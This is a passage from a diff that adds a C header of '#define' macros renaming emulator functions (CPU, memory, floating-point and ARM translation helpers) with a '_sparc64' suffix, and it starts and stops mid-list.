cpu_get_real_ticks_sparc64 +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_sparc64 +#define cpu_handle_debug_exception cpu_handle_debug_exception_sparc64 +#define cpu_handle_guest_debug cpu_handle_guest_debug_sparc64 +#define cpu_inb cpu_inb_sparc64 +#define cpu_inl cpu_inl_sparc64 +#define cpu_interrupt cpu_interrupt_sparc64 +#define cpu_interrupt_handler cpu_interrupt_handler_sparc64 +#define cpu_inw cpu_inw_sparc64 +#define cpu_io_recompile cpu_io_recompile_sparc64 +#define cpu_is_stopped cpu_is_stopped_sparc64 +#define cpu_ldl_code cpu_ldl_code_sparc64 +#define cpu_ldub_code cpu_ldub_code_sparc64 +#define cpu_lduw_code cpu_lduw_code_sparc64 +#define cpu_memory_rw_debug cpu_memory_rw_debug_sparc64 +#define cpu_mmu_index cpu_mmu_index_sparc64 +#define cpu_outb cpu_outb_sparc64 +#define cpu_outl cpu_outl_sparc64 +#define cpu_outw cpu_outw_sparc64 +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_sparc64 +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_sparc64 +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_sparc64 +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_sparc64 +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_sparc64 +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_sparc64 +#define cpu_physical_memory_map cpu_physical_memory_map_sparc64 +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_sparc64 +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_sparc64 +#define cpu_physical_memory_rw cpu_physical_memory_rw_sparc64 +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_sparc64 +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_sparc64 +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_sparc64 +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_sparc64 +#define 
cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_sparc64 +#define cpu_register cpu_register_sparc64 +#define cpu_register_types cpu_register_types_sparc64 +#define cpu_restore_state cpu_restore_state_sparc64 +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_sparc64 +#define cpu_single_step cpu_single_step_sparc64 +#define cpu_tb_exec cpu_tb_exec_sparc64 +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_sparc64 +#define cpu_to_be64 cpu_to_be64_sparc64 +#define cpu_to_le32 cpu_to_le32_sparc64 +#define cpu_to_le64 cpu_to_le64_sparc64 +#define cpu_type_info cpu_type_info_sparc64 +#define cpu_unassigned_access cpu_unassigned_access_sparc64 +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_sparc64 +#define cpu_watchpoint_insert cpu_watchpoint_insert_sparc64 +#define cpu_watchpoint_remove cpu_watchpoint_remove_sparc64 +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_sparc64 +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_sparc64 +#define crc32c_table crc32c_table_sparc64 +#define create_new_memory_mapping create_new_memory_mapping_sparc64 +#define csselr_write csselr_write_sparc64 +#define cto32 cto32_sparc64 +#define ctr_el0_access ctr_el0_access_sparc64 +#define ctz32 ctz32_sparc64 +#define ctz64 ctz64_sparc64 +#define dacr_write dacr_write_sparc64 +#define dbgbcr_write dbgbcr_write_sparc64 +#define dbgbvr_write dbgbvr_write_sparc64 +#define dbgwcr_write dbgwcr_write_sparc64 +#define dbgwvr_write dbgwvr_write_sparc64 +#define debug_cp_reginfo debug_cp_reginfo_sparc64 +#define debug_frame debug_frame_sparc64 +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_sparc64 +#define define_arm_cp_regs define_arm_cp_regs_sparc64 +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_sparc64 +#define define_debug_regs define_debug_regs_sparc64 +#define define_one_arm_cp_reg define_one_arm_cp_reg_sparc64 +#define define_one_arm_cp_reg_with_opaque 
define_one_arm_cp_reg_with_opaque_sparc64 +#define deposit32 deposit32_sparc64 +#define deposit64 deposit64_sparc64 +#define deregister_tm_clones deregister_tm_clones_sparc64 +#define device_class_base_init device_class_base_init_sparc64 +#define device_class_init device_class_init_sparc64 +#define device_finalize device_finalize_sparc64 +#define device_get_realized device_get_realized_sparc64 +#define device_initfn device_initfn_sparc64 +#define device_post_init device_post_init_sparc64 +#define device_reset device_reset_sparc64 +#define device_set_realized device_set_realized_sparc64 +#define device_type_info device_type_info_sparc64 +#define disas_arm_insn disas_arm_insn_sparc64 +#define disas_coproc_insn disas_coproc_insn_sparc64 +#define disas_dsp_insn disas_dsp_insn_sparc64 +#define disas_iwmmxt_insn disas_iwmmxt_insn_sparc64 +#define disas_neon_data_insn disas_neon_data_insn_sparc64 +#define disas_neon_ls_insn disas_neon_ls_insn_sparc64 +#define disas_thumb2_insn disas_thumb2_insn_sparc64 +#define disas_thumb_insn disas_thumb_insn_sparc64 +#define disas_vfp_insn disas_vfp_insn_sparc64 +#define disas_vfp_v8_insn disas_vfp_v8_insn_sparc64 +#define do_arm_semihosting do_arm_semihosting_sparc64 +#define do_clz16 do_clz16_sparc64 +#define do_clz8 do_clz8_sparc64 +#define do_constant_folding do_constant_folding_sparc64 +#define do_constant_folding_2 do_constant_folding_2_sparc64 +#define do_constant_folding_cond do_constant_folding_cond_sparc64 +#define do_constant_folding_cond2 do_constant_folding_cond2_sparc64 +#define do_constant_folding_cond_32 do_constant_folding_cond_32_sparc64 +#define do_constant_folding_cond_64 do_constant_folding_cond_64_sparc64 +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_sparc64 +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_sparc64 +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_sparc64 +#define do_ssat do_ssat_sparc64 +#define do_usad do_usad_sparc64 +#define do_usat do_usat_sparc64 +#define do_v7m_exception_exit 
do_v7m_exception_exit_sparc64 +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_sparc64 +#define dummy_func dummy_func_sparc64 +#define dummy_section dummy_section_sparc64 +#define _DYNAMIC _DYNAMIC_sparc64 +#define _edata _edata_sparc64 +#define _end _end_sparc64 +#define end_list end_list_sparc64 +#define eq128 eq128_sparc64 +#define ErrorClass_lookup ErrorClass_lookup_sparc64 +#define error_copy error_copy_sparc64 +#define error_exit error_exit_sparc64 +#define error_get_class error_get_class_sparc64 +#define error_get_pretty error_get_pretty_sparc64 +#define error_setg_file_open error_setg_file_open_sparc64 +#define estimateDiv128To64 estimateDiv128To64_sparc64 +#define estimateSqrt32 estimateSqrt32_sparc64 +#define excnames excnames_sparc64 +#define excp_is_internal excp_is_internal_sparc64 +#define extended_addresses_enabled extended_addresses_enabled_sparc64 +#define extended_mpu_ap_bits extended_mpu_ap_bits_sparc64 +#define extract32 extract32_sparc64 +#define extract64 extract64_sparc64 +#define extractFloat128Exp extractFloat128Exp_sparc64 +#define extractFloat128Frac0 extractFloat128Frac0_sparc64 +#define extractFloat128Frac1 extractFloat128Frac1_sparc64 +#define extractFloat128Sign extractFloat128Sign_sparc64 +#define extractFloat16Exp extractFloat16Exp_sparc64 +#define extractFloat16Frac extractFloat16Frac_sparc64 +#define extractFloat16Sign extractFloat16Sign_sparc64 +#define extractFloat32Exp extractFloat32Exp_sparc64 +#define extractFloat32Frac extractFloat32Frac_sparc64 +#define extractFloat32Sign extractFloat32Sign_sparc64 +#define extractFloat64Exp extractFloat64Exp_sparc64 +#define extractFloat64Frac extractFloat64Frac_sparc64 +#define extractFloat64Sign extractFloat64Sign_sparc64 +#define extractFloatx80Exp extractFloatx80Exp_sparc64 +#define extractFloatx80Frac extractFloatx80Frac_sparc64 +#define extractFloatx80Sign extractFloatx80Sign_sparc64 +#define fcse_write fcse_write_sparc64 +#define find_better_copy find_better_copy_sparc64 +#define 
find_default_machine find_default_machine_sparc64 +#define find_desc_by_name find_desc_by_name_sparc64 +#define find_first_bit find_first_bit_sparc64 +#define find_paging_enabled_cpu find_paging_enabled_cpu_sparc64 +#define find_ram_block find_ram_block_sparc64 +#define find_ram_offset find_ram_offset_sparc64 +#define find_string find_string_sparc64 +#define find_type find_type_sparc64 +#define _fini _fini_sparc64 +#define flatrange_equal flatrange_equal_sparc64 +#define flatview_destroy flatview_destroy_sparc64 +#define flatview_init flatview_init_sparc64 +#define flatview_insert flatview_insert_sparc64 +#define flatview_lookup flatview_lookup_sparc64 +#define flatview_ref flatview_ref_sparc64 +#define flatview_simplify flatview_simplify_sparc64 +#define flatview_unref flatview_unref_sparc64 +#define float128_add float128_add_sparc64 +#define float128_compare float128_compare_sparc64 +#define float128_compare_internal float128_compare_internal_sparc64 +#define float128_compare_quiet float128_compare_quiet_sparc64 +#define float128_default_nan float128_default_nan_sparc64 +#define float128_div float128_div_sparc64 +#define float128_eq float128_eq_sparc64 +#define float128_eq_quiet float128_eq_quiet_sparc64 +#define float128_is_quiet_nan float128_is_quiet_nan_sparc64 +#define float128_is_signaling_nan float128_is_signaling_nan_sparc64 +#define float128_le float128_le_sparc64 +#define float128_le_quiet float128_le_quiet_sparc64 +#define float128_lt float128_lt_sparc64 +#define float128_lt_quiet float128_lt_quiet_sparc64 +#define float128_maybe_silence_nan float128_maybe_silence_nan_sparc64 +#define float128_mul float128_mul_sparc64 +#define float128_rem float128_rem_sparc64 +#define float128_round_to_int float128_round_to_int_sparc64 +#define float128_scalbn float128_scalbn_sparc64 +#define float128_sqrt float128_sqrt_sparc64 +#define float128_sub float128_sub_sparc64 +#define float128ToCommonNaN float128ToCommonNaN_sparc64 +#define float128_to_float32 
float128_to_float32_sparc64 +#define float128_to_float64 float128_to_float64_sparc64 +#define float128_to_floatx80 float128_to_floatx80_sparc64 +#define float128_to_int32 float128_to_int32_sparc64 +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_sparc64 +#define float128_to_int64 float128_to_int64_sparc64 +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_sparc64 +#define float128_unordered float128_unordered_sparc64 +#define float128_unordered_quiet float128_unordered_quiet_sparc64 +#define float16_default_nan float16_default_nan_sparc64 +#define float16_is_quiet_nan float16_is_quiet_nan_sparc64 +#define float16_is_signaling_nan float16_is_signaling_nan_sparc64 +#define float16_maybe_silence_nan float16_maybe_silence_nan_sparc64 +#define float16ToCommonNaN float16ToCommonNaN_sparc64 +#define float16_to_float32 float16_to_float32_sparc64 +#define float16_to_float64 float16_to_float64_sparc64 +#define float32_abs float32_abs_sparc64 +#define float32_add float32_add_sparc64 +#define float32_chs float32_chs_sparc64 +#define float32_compare float32_compare_sparc64 +#define float32_compare_internal float32_compare_internal_sparc64 +#define float32_compare_quiet float32_compare_quiet_sparc64 +#define float32_default_nan float32_default_nan_sparc64 +#define float32_div float32_div_sparc64 +#define float32_eq float32_eq_sparc64 +#define float32_eq_quiet float32_eq_quiet_sparc64 +#define float32_exp2 float32_exp2_sparc64 +#define float32_exp2_coefficients float32_exp2_coefficients_sparc64 +#define float32_is_any_nan float32_is_any_nan_sparc64 +#define float32_is_infinity float32_is_infinity_sparc64 +#define float32_is_neg float32_is_neg_sparc64 +#define float32_is_quiet_nan float32_is_quiet_nan_sparc64 +#define float32_is_signaling_nan float32_is_signaling_nan_sparc64 +#define float32_is_zero float32_is_zero_sparc64 +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_sparc64 +#define float32_le float32_le_sparc64 
+#define float32_le_quiet float32_le_quiet_sparc64 +#define float32_log2 float32_log2_sparc64 +#define float32_lt float32_lt_sparc64 +#define float32_lt_quiet float32_lt_quiet_sparc64 +#define float32_max float32_max_sparc64 +#define float32_maxnum float32_maxnum_sparc64 +#define float32_maxnummag float32_maxnummag_sparc64 +#define float32_maybe_silence_nan float32_maybe_silence_nan_sparc64 +#define float32_min float32_min_sparc64 +#define float32_minmax float32_minmax_sparc64 +#define float32_minnum float32_minnum_sparc64 +#define float32_minnummag float32_minnummag_sparc64 +#define float32_mul float32_mul_sparc64 +#define float32_muladd float32_muladd_sparc64 +#define float32_rem float32_rem_sparc64 +#define float32_round_to_int float32_round_to_int_sparc64 +#define float32_scalbn float32_scalbn_sparc64 +#define float32_set_sign float32_set_sign_sparc64 +#define float32_sqrt float32_sqrt_sparc64 +#define float32_squash_input_denormal float32_squash_input_denormal_sparc64 +#define float32_sub float32_sub_sparc64 +#define float32ToCommonNaN float32ToCommonNaN_sparc64 +#define float32_to_float128 float32_to_float128_sparc64 +#define float32_to_float16 float32_to_float16_sparc64 +#define float32_to_float64 float32_to_float64_sparc64 +#define float32_to_floatx80 float32_to_floatx80_sparc64 +#define float32_to_int16 float32_to_int16_sparc64 +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_sparc64 +#define float32_to_int32 float32_to_int32_sparc64 +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_sparc64 +#define float32_to_int64 float32_to_int64_sparc64 +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_sparc64 +#define float32_to_uint16 float32_to_uint16_sparc64 +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_sparc64 +#define float32_to_uint32 float32_to_uint32_sparc64 +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_sparc64 +#define float32_to_uint64 
float32_to_uint64_sparc64 +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_sparc64 +#define float32_unordered float32_unordered_sparc64 +#define float32_unordered_quiet float32_unordered_quiet_sparc64 +#define float64_abs float64_abs_sparc64 +#define float64_add float64_add_sparc64 +#define float64_chs float64_chs_sparc64 +#define float64_compare float64_compare_sparc64 +#define float64_compare_internal float64_compare_internal_sparc64 +#define float64_compare_quiet float64_compare_quiet_sparc64 +#define float64_default_nan float64_default_nan_sparc64 +#define float64_div float64_div_sparc64 +#define float64_eq float64_eq_sparc64 +#define float64_eq_quiet float64_eq_quiet_sparc64 +#define float64_is_any_nan float64_is_any_nan_sparc64 +#define float64_is_infinity float64_is_infinity_sparc64 +#define float64_is_neg float64_is_neg_sparc64 +#define float64_is_quiet_nan float64_is_quiet_nan_sparc64 +#define float64_is_signaling_nan float64_is_signaling_nan_sparc64 +#define float64_is_zero float64_is_zero_sparc64 +#define float64_le float64_le_sparc64 +#define float64_le_quiet float64_le_quiet_sparc64 +#define float64_log2 float64_log2_sparc64 +#define float64_lt float64_lt_sparc64 +#define float64_lt_quiet float64_lt_quiet_sparc64 +#define float64_max float64_max_sparc64 +#define float64_maxnum float64_maxnum_sparc64 +#define float64_maxnummag float64_maxnummag_sparc64 +#define float64_maybe_silence_nan float64_maybe_silence_nan_sparc64 +#define float64_min float64_min_sparc64 +#define float64_minmax float64_minmax_sparc64 +#define float64_minnum float64_minnum_sparc64 +#define float64_minnummag float64_minnummag_sparc64 +#define float64_mul float64_mul_sparc64 +#define float64_muladd float64_muladd_sparc64 +#define float64_rem float64_rem_sparc64 +#define float64_round_to_int float64_round_to_int_sparc64 +#define float64_scalbn float64_scalbn_sparc64 +#define float64_set_sign float64_set_sign_sparc64 +#define float64_sqrt float64_sqrt_sparc64 
+#define float64_squash_input_denormal float64_squash_input_denormal_sparc64 +#define float64_sub float64_sub_sparc64 +#define float64ToCommonNaN float64ToCommonNaN_sparc64 +#define float64_to_float128 float64_to_float128_sparc64 +#define float64_to_float16 float64_to_float16_sparc64 +#define float64_to_float32 float64_to_float32_sparc64 +#define float64_to_floatx80 float64_to_floatx80_sparc64 +#define float64_to_int16 float64_to_int16_sparc64 +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_sparc64 +#define float64_to_int32 float64_to_int32_sparc64 +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_sparc64 +#define float64_to_int64 float64_to_int64_sparc64 +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_sparc64 +#define float64_to_uint16 float64_to_uint16_sparc64 +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_sparc64 +#define float64_to_uint32 float64_to_uint32_sparc64 +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_sparc64 +#define float64_to_uint64 float64_to_uint64_sparc64 +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_sparc64 +#define float64_trunc_to_int float64_trunc_to_int_sparc64 +#define float64_unordered float64_unordered_sparc64 +#define float64_unordered_quiet float64_unordered_quiet_sparc64 +#define float_raise float_raise_sparc64 +#define floatx80_add floatx80_add_sparc64 +#define floatx80_compare floatx80_compare_sparc64 +#define floatx80_compare_internal floatx80_compare_internal_sparc64 +#define floatx80_compare_quiet floatx80_compare_quiet_sparc64 +#define floatx80_default_nan floatx80_default_nan_sparc64 +#define floatx80_div floatx80_div_sparc64 +#define floatx80_eq floatx80_eq_sparc64 +#define floatx80_eq_quiet floatx80_eq_quiet_sparc64 +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_sparc64 +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_sparc64 +#define floatx80_le floatx80_le_sparc64 
+#define floatx80_le_quiet floatx80_le_quiet_sparc64 +#define floatx80_lt floatx80_lt_sparc64 +#define floatx80_lt_quiet floatx80_lt_quiet_sparc64 +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_sparc64 +#define floatx80_mul floatx80_mul_sparc64 +#define floatx80_rem floatx80_rem_sparc64 +#define floatx80_round_to_int floatx80_round_to_int_sparc64 +#define floatx80_scalbn floatx80_scalbn_sparc64 +#define floatx80_sqrt floatx80_sqrt_sparc64 +#define floatx80_sub floatx80_sub_sparc64 +#define floatx80ToCommonNaN floatx80ToCommonNaN_sparc64 +#define floatx80_to_float128 floatx80_to_float128_sparc64 +#define floatx80_to_float32 floatx80_to_float32_sparc64 +#define floatx80_to_float64 floatx80_to_float64_sparc64 +#define floatx80_to_int32 floatx80_to_int32_sparc64 +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_sparc64 +#define floatx80_to_int64 floatx80_to_int64_sparc64 +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_sparc64 +#define floatx80_unordered floatx80_unordered_sparc64 +#define floatx80_unordered_quiet floatx80_unordered_quiet_sparc64 +#define flush_icache_range flush_icache_range_sparc64 +#define format_string format_string_sparc64 +#define fp_decode_rm fp_decode_rm_sparc64 +#define frame_dummy frame_dummy_sparc64 +#define free_range free_range_sparc64 +#define fstat64 fstat64_sparc64 +#define futex_wait futex_wait_sparc64 +#define futex_wake futex_wake_sparc64 +#define gen_aa32_ld16s gen_aa32_ld16s_sparc64 +#define gen_aa32_ld16u gen_aa32_ld16u_sparc64 +#define gen_aa32_ld32u gen_aa32_ld32u_sparc64 +#define gen_aa32_ld64 gen_aa32_ld64_sparc64 +#define gen_aa32_ld8s gen_aa32_ld8s_sparc64 +#define gen_aa32_ld8u gen_aa32_ld8u_sparc64 +#define gen_aa32_st16 gen_aa32_st16_sparc64 +#define gen_aa32_st32 gen_aa32_st32_sparc64 +#define gen_aa32_st64 gen_aa32_st64_sparc64 +#define gen_aa32_st8 gen_aa32_st8_sparc64 +#define gen_adc gen_adc_sparc64 +#define gen_adc_CC gen_adc_CC_sparc64 +#define 
gen_add16 gen_add16_sparc64 +#define gen_add_carry gen_add_carry_sparc64 +#define gen_add_CC gen_add_CC_sparc64 +#define gen_add_datah_offset gen_add_datah_offset_sparc64 +#define gen_add_data_offset gen_add_data_offset_sparc64 +#define gen_addq gen_addq_sparc64 +#define gen_addq_lo gen_addq_lo_sparc64 +#define gen_addq_msw gen_addq_msw_sparc64 +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_sparc64 +#define gen_arm_shift_im gen_arm_shift_im_sparc64 +#define gen_arm_shift_reg gen_arm_shift_reg_sparc64 +#define gen_bx gen_bx_sparc64 +#define gen_bx_im gen_bx_im_sparc64 +#define gen_clrex gen_clrex_sparc64 +#define generate_memory_topology generate_memory_topology_sparc64 +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_sparc64 +#define gen_exception gen_exception_sparc64 +#define gen_exception_insn gen_exception_insn_sparc64 +#define gen_exception_internal gen_exception_internal_sparc64 +#define gen_exception_internal_insn gen_exception_internal_insn_sparc64 +#define gen_exception_return gen_exception_return_sparc64 +#define gen_goto_tb gen_goto_tb_sparc64 +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_sparc64 +#define gen_helper_add_saturate gen_helper_add_saturate_sparc64 +#define gen_helper_add_setq gen_helper_add_setq_sparc64 +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_sparc64 +#define gen_helper_clz32 gen_helper_clz32_sparc64 +#define gen_helper_clz64 gen_helper_clz64_sparc64 +#define gen_helper_clz_arm gen_helper_clz_arm_sparc64 +#define gen_helper_cpsr_read gen_helper_cpsr_read_sparc64 +#define gen_helper_cpsr_write gen_helper_cpsr_write_sparc64 +#define gen_helper_crc32_arm gen_helper_crc32_arm_sparc64 +#define gen_helper_crc32c gen_helper_crc32c_sparc64 +#define gen_helper_crypto_aese gen_helper_crypto_aese_sparc64 +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_sparc64 +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_sparc64 +#define gen_helper_crypto_sha1h 
gen_helper_crypto_sha1h_sparc64 +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_sparc64 +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_sparc64 +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_sparc64 +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_sparc64 +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_sparc64 +#define gen_helper_double_saturate gen_helper_double_saturate_sparc64 +#define gen_helper_exception_internal gen_helper_exception_internal_sparc64 +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_sparc64 +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_sparc64 +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_sparc64 +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_sparc64 +#define gen_helper_get_user_reg gen_helper_get_user_reg_sparc64 +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_sparc64 +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_sparc64 +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_sparc64 +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_sparc64 +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_sparc64 +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_sparc64 +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_sparc64 +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_sparc64 +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_sparc64 +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_sparc64 +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_sparc64 +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_sparc64 +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_sparc64 +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_sparc64 +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_sparc64 +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_sparc64 +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_sparc64 +#define 
gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_sparc64 +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_sparc64 +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_sparc64 +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_sparc64 +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_sparc64 +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_sparc64 +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_sparc64 +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_sparc64 +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_sparc64 +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_sparc64 +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_sparc64 +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_sparc64 +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_sparc64 +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_sparc64 +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_sparc64 +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_sparc64 +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_sparc64 +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_sparc64 +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_sparc64 +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_sparc64 +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_sparc64 +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_sparc64 +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_sparc64 +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_sparc64 +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_sparc64 +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_sparc64 +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_sparc64 +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_sparc64 +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_sparc64 +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_sparc64 +#define 
gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_sparc64 +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_sparc64 +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_sparc64 +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_sparc64 +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_sparc64 +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_sparc64 +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_sparc64 +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_sparc64 +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_sparc64 +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_sparc64 +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_sparc64 +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_sparc64 +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_sparc64 +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_sparc64 +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_sparc64 +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_sparc64 +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_sparc64 +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_sparc64 +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_sparc64 +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_sparc64 +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_sparc64 +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_sparc64 +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_sparc64 +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_sparc64 +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_sparc64 +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_sparc64 +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_sparc64 +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_sparc64 +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_sparc64 +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_sparc64 +#define gen_helper_iwmmxt_srlw 
